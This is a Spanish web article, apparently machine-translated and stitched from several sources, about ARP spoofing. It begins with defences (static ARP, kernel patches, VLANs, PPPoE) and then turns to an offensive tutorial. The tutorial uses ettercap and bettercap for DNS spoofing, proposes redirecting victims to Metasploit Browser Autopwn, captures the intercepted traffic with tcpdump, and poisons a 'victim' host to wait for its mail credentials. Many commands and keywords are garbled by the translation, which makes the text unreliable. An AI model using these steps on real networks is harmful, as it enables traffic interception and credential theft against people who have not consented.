Si necesita interceptar el tráfico que va desde un nodo de la red a una red externa, debe atacar el nodo y la puerta de enlace de la red. Sin embargo, es mucho más probable que la detección de suplantación de identidad ARP esté presente en una puerta de enlace que en un host. Ya que estamos interesados en el tráfico que el nodo envía en la red, basta con modificar la tabla ARP solo del nodo y no correr el riesgo de ser detectado por la puerta de enlace. Los datos que la puerta de enlace envía al nodo pasarán directamente, y los datos que el nodo envía a la puerta de enlace pasarán por el sistema del atacante. (tanto en la puerta de enlace como en el nodo sería posible rastrear que las direcciones MAC de los paquetes provenientes del nodo difieren de las escritas en su tabla ARP, es decir, que los paquetes se envían a una dirección MAC y provienen de otra. ¿Pero qué sistemas hacen esto?)

ARP estático

Puede abordar radicalmente las debilidades del protocolo ARP, simplemente no usarlo. La tabla ARP se puede crear manualmente y se vuelve invulnerable a los ataques ARP. Para hacer esto, debe agregar las direcciones MAC necesarias a la tabla.

Si deshabilita el uso de ARP en las interfaces de red, entonces solo se podrá acceder a aquellos sistemas (1) cuyas direcciones MAC se agreguen a la tabla ARP de nuestro nodo y (2) nuestra dirección MAC se agregue a las tablas ARP de los nodos con el cual se realiza el intercambio de tráfico.

Si no desactiva el uso de ARP en las interfaces de red, la dirección MAC especificada estáticamente tiene prioridad. Si no se especifica una dirección MAC para una dirección IP, se utiliza una solicitud ARP.

Se puede obtener una tabla ARP estática a partir de una tabla ARP de enrutador existente:

%# arp -an | grep -v entrada | awk "(imprimir $2" "$4)" | tr -d "()"

Si lo escribes así:

%# arp -an | grep -v entrada | awk "(imprimir $2" "$4)" | tr -d "()" > /etc/éteres

se escribirá en el archivo /etc/ethers

Es necesario que la tabla contenga el número máximo de máquinas de la red. Debe crear una tabla en el momento de máxima actividad de la red o primero revisar todo el rango de direcciones con pings:

para i en `seq 1 255`
hacer
ping -c 1 192.168.15.$i >& /dev/null &
hecho

(aquí 192.168.15.0/24 es la red para la cual se realiza el escaneo). Una vez creado el archivo /etc/ethers, se puede cargar usando el comando:

%# ifconfig eth1 -arp

Ventajas y desventajas

El método de generar tablas ARP manualmente tiene las siguientes desventajas:

Se agrega una gran cantidad de trabajo de rutina asociado con la adición y modificación de direcciones MAC. Cada cambio en la red asociado con el reemplazo o reorganización de tarjetas de red debe ir acompañado de la edición de las tablas ARP en los archivos.
Los nodos cliente siguen siendo vulnerables a la suplantación de ARP.

Parches del kernel del sistema

Existe un parche (sugerido por buggzy) para los kernels de Linux/FreeBSD que minimiza el riesgo de un ataque de suplantación de ARP exitoso contra sistemas parcheados.

La esencia del método es la siguiente. Cuando se recibe una respuesta ARP, se comparan las direcciones MAC antiguas y nuevas y, si se detecta un cambio, se inicia el procedimiento de verificación. Se envía una solicitud ARP, que requiere que todos los propietarios de la dirección IP proporcionen sus direcciones MAC.

Si se lleva a cabo un ataque, el sistema real que tiene esta dirección IP responderá a la solicitud y, por tanto, se reconocerá el ataque. Si el cambio en la dirección MAC no estuvo asociado con un ataque, sino con situaciones estándar, no habrá respuesta que contenga la dirección MAC "antigua" y, después de un cierto tiempo de espera, el sistema actualizará la entrada de la caché.

Cuando se detecta una situación sospechosa (“doble”), el kernel muestra el mensaje: “ARP_ANTIDOTE: ¡Posible intento MITM!”, y no actualiza la entrada de caché ARP, sino que, por el contrario, registra la entrada anterior como estática. Una vez identificada y neutralizada la fuente del ataque, se puede eliminar la entrada estática.

Parches que implementan este método de lucha:

* arp_antídoto para Linux
* arp_antidote 2 para Linux
* Parche Arp Poison para FreeBSD

Los parches sólo funcionan con el kernel de la serie 2.4.

Otros métodos para combatir la suplantación de ARP

Desafortunadamente, este método no es aplicable a sistemas Windows ni a otros sistemas que ejecutan un sistema operativo cuyo código fuente no está disponible.

El problema debe resolverse radicalmente: la red debe construirse de tal manera que realizar una suplantación de ARP en ella sea fundamentalmente imposible. Y si es posible, entonces inútil.

Esto se puede hacer de dos formas:

1. Limite el dominio de difusión para cada nodo al nivel de dos nodos: el propio nodo y la puerta de enlace más cercana. más detalles. Por qué no se puede realizar el ataque en este caso. Entonces simplemente no hay nadie que lleve a cabo el ataque: se necesita un tercero. Pero él no está ahí.
2. Asegúrese de que todo, absolutamente todo, lo que se transmite en la red esté encriptado y que las escuchas clandestinas de estos datos no conducirán a nada. Cualquier cambio de datos, si se produce, se detecta inmediatamente. Es decir, de hecho, la red debe ser la misma y segura cuando se usa en lugar de un conmutador concentrador.

El primer método se realiza utilizando VLAN. El segundo es con la ayuda. PPPoE.

Usando VLAN

La computadora C puede usar la suplantación de ARP contra la computadora A solo si están en la misma red de capa de enlace. En el caso de que estén separados por un enrutador, el ataque es imposible (un ataque al enrutador es posible, pero ese es un asunto completamente diferente).

Las VLAN ayudan a segmentar una red: convierten una red en muchos fragmentos aislados a nivel de enlace, que están interconectados por un enrutador. Un ataque de suplantación de ARP sólo es posible entre ordenadores ubicados en la misma VLAN. En el caso más extremo, cuando sólo hay dos ordenadores en cada VLAN: el propio ordenador y el enrutador, un ataque de suplantación de ARP se vuelve en principio imposible. Desafortunadamente, este tipo de redes exigen mucho los recursos del enrutador y rara vez se utilizan.

Ventajas

No se requiere nada del cliente. Funciona como siempre. Si la dirección IP está configurada de forma estática, deberá cambiar la dirección IP y la máscara de red.
Los datos no están cifrados y no hay pérdida de rendimiento. Pequeñas pérdidas debido a campos adicionales en el encabezado.
Es imposible organizar el intercambio de datos sin pasar por la puerta de enlace entre nodos en diferentes VLAN. Si cada nodo está en su propia VLAN, dicho intercambio es imposible en absoluto.

Defectos

El conmutador debe admitir VLAN.
Es necesario dedicar tiempo a configurar las VLAN y, además, configurar el servidor DHCP.
Los datos no están cifrados. Si de alguna manera se logra escucharlos, se pueden leer y/o modificar.

Usando PPPoE

Ventajas

Los datos están cifrados
No hay requisitos de hardware. Ni siquiera es necesario que la red sea telefónica.

Defectos

El cliente requiere configuración de acceso PPPoE. Algunos sistemas requieren la instalación de un software de cliente especial.
Debido a las pérdidas de encapsulación, el rendimiento de la red disminuye. Si se realiza el cifrado de datos, aumentan las pérdidas temporales.
Con el acuerdo mutuo de las partes, es posible organizar el intercambio de datos entre nodos sin pasar por la puerta de enlace.
Con un gran número de conexiones PPPoE (>200), aumenta la carga en el procesador central del servidor. A veces hay que sacrificar el cifrado de datos.
Si hay una gran carga en el servidor es más fácil usar PPTPd o IPsec

Mitos y conceptos erróneos sobre la suplantación de ARP

La suplantación de ARP se puede evitar utilizando la función de seguridad de puertos de los conmutadores.

La función de seguridad de puerto del conmutador le permite protegerse contra cambios en la dirección MAC en el puerto del conmutador. Si una computadora conectada al puerto del conmutador cambia su dirección MAC o si la computadora cambia, el conmutador nota la sustitución y deja de transmitir los paquetes enviados con la nueva dirección de retorno. Además, se pueden realizar otras acciones: enviar una captura SNMP, escribir en syslog y similares.

Con la suplantación de identidad ARP, la dirección MAC del remitente (atacante) no cambia y, por lo tanto, desde el punto de vista de la seguridad del puerto, no hay anomalías. La función de seguridad del puerto no es de ninguna manera responsable de hacer coincidir las direcciones IP y MAC, y el ataque de suplantación de ARP se basa en esto.

El sistema operativo utilizado en los ejemplos es Ubuntu 14.04. Una parte importante de las operaciones anteriores requieren derechos de superusuario, y las utilidades lo informan de una forma u otra si no tienen suficiente autoridad. Supondremos que todos los comandos se ejecutan en nombre del superusuario.

Envenenamiento por ARP (suplantación de identidad)

¿Qué oportunidades ofrece la suplantación de ARP?

Suplantación de DNS

Consideremos la suplantación de DNS, dirigida contra el host que realiza una solicitud al servidor DNS. Habiendo realizado previamente la suplantación de identidad de ARP, interceptaremos las respuestas del servidor DNS si cumplen con nuestras reglas de reemplazo y luego las reemplazaremos; Usamos ettercap.

1. Edite las reglas de redirección en el archivo:

/etc/ettercap/etter.dns

Por ejemplo, redirigir solicitudes a google.com a la dirección local 192.168.1.34 .

google.com Un 192.168.1.34
*. google.com Un 192.168.1.34
www.google.com PTR 192.168.1.34

2. Ejecute ettercap para falsificar las respuestas del servidor DNS:
-PAG dns_spoof - utilice el complemento dns_spoof:

ettercap-Tq-i wlan0 -PAG dns_spoof-METRO arpía :remoto // 192.168.1.1 // // 192.168.1.44 //

Puede activar el complemento dns_spoof después de que se haya iniciado ettercap. El menú de ettercap le indicará cómo hacer esto, lo cual se puede ver presionando la tecla h mientras el programa se está ejecutando.
Si intenta iniciar sesión desde la máquina google.com entonces la salida será así:

<...>
Activando el complemento dns_spoof...
dns_spoof: falsificado para

Las respuestas a la solicitud de google.com se reemplazan de acuerdo con las reglas, mientras que el resto no se modifica.

192.168.1.1 - enrutador, 192.168.1.44 - el anfitrión siendo atacado, 192.168.1.34 - IP google.com después de la suplantación de identidad.

Este tipo de ataque se puede utilizar para redirigir al atacante a una página con código malicioso (Metasploit Browser Autopwn) para una mayor penetración.

mejor tapa
Bettercap funciona de manera similar, la dirección IP de destino (-T ) - parámetro opcional:

mejor tapa--dns dns.conf

El contenido del archivo que describe las reglas de reemplazo se describe en forma de expresiones regulares. Por ejemplo

192.168.1.2 .* # reemplazará cualquier dirección con 192.168.1.2

Descarga de tráfico

tcpdump -i interfaz -w archivo para escribir

tcpdump -i wlan0 -w volcado.pcap

Para registrar solo el tráfico interceptado, debe usar un filtro de IP (agregue un puerto si es necesario) puerto ):

tcpdump -i wlan0 -w volcado.pcap anfitrión 192.168.1.36 y puerto 80

src , horario de verano , anfitrión - filtrar por IP del remitente del paquete, destinatario o destinatarios o remitente, respectivamente.
Se utilizan src y dst y para especificar el puerto de origen y destino, se utilizan operadores booleanos para filtros complejos. o , y Y no (|| , && Y ! ).

Este artículo le mostrará cómo interceptar el tráfico en su red local usando Ettercap. Utilizando ataques MITM (ataques Man In The Middle) para este fin.

– Utilidad de código abierto para analizar la seguridad de redes informáticas. El objetivo principal son los ataques MITM (ataques Man In The Middle). Tiene la capacidad de rastrear conexiones en vivo, filtrar contenido sobre la marcha, así como muchas otras características interesantes. Admite ataques de protocolo tanto activos como pasivos e incluye una gran cantidad de funciones de análisis de red y host.

Más información se puede encontrar en

Instalación/configuración de Ettercap

Puede descargar e instalar Ettercap desde la fuente: . Como alternativa, puede utilizar el siguiente comando:

# apt-get install ettercap-gtk ettercap-común

Encontramos estas líneas en él y las descomentamos:

# si usa iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING - i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

# si usas iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Una vez completadas todas las operaciones anteriores, inicie Ettercap. Sin embargo, para algunas personas, incluyéndome a mí, Ettercap no funcionará. Errores como “ ENVIAR ERROR L3“. Para evitar que aparezcan este tipo de errores, utilice el siguiente comando:

# echo "1" > /proc/sys/net/ipv4/ip_forward # cat /proc/sys/net/ipv4/ip_forward 1

# echo "1" > /proc/sys/net/ipv4/ip_forward

# gato /proc/sys/net/ipv4/ip_forward

Ahora todo debería funcionar bien y no deberían aparecer errores.

Envenenamiento por ARP

Anteriormente se describió qué es "" y por qué es necesario. Aquí también se describirá cómo implementarlo usando Ettercap.

Primero, observe la arquitectura de red (consulte la figura siguiente) que se utilizará. Esto es necesario para que comprenda bien qué viene y de dónde:

Lanzar Ettercap:

Aparecerá una ventana de aplicación frente a nosotros, como se muestra a continuación:

Haga clic en el botón Oler-> Olfateo unificado. Después de eso, seleccione la interfaz que se utiliza. tengo esto eth0:

En el menú superior presione los botones Hospedadores–Buscar hosts:

Ahora hagamos clic de nuevo Hospedadores–Lista de anfitriones. Aparecerá una ventana como se muestra en la siguiente figura:

Aquí necesitamos seleccionar objetivos, es decir. seleccione una máquina que actuará como “víctima” y puerta de enlace. Como se puede ver en la arquitectura de la red que utilizamos, la "víctima" es una máquina con Dirección IP = 192.168.1.3. Bueno, como puerta de entrada. Dirección IP = 192.168.1.1. Por lo tanto, seleccione 192.168.1.3 y presione el botón Añadir al objetivo 1. Ahora haga clic en 192.168.1.1 y presione el botón Añadir al objetivo 2.

Hacer clic DE ACUERDO. Ya sólo queda lanzarlo. Para hacer esto, haga clic en el botón Comenzar–empezar a oler.

El olfato ha comenzado. Sólo queda esperar hasta que el usuario introduzca sus datos, por ejemplo de su cuenta de correo.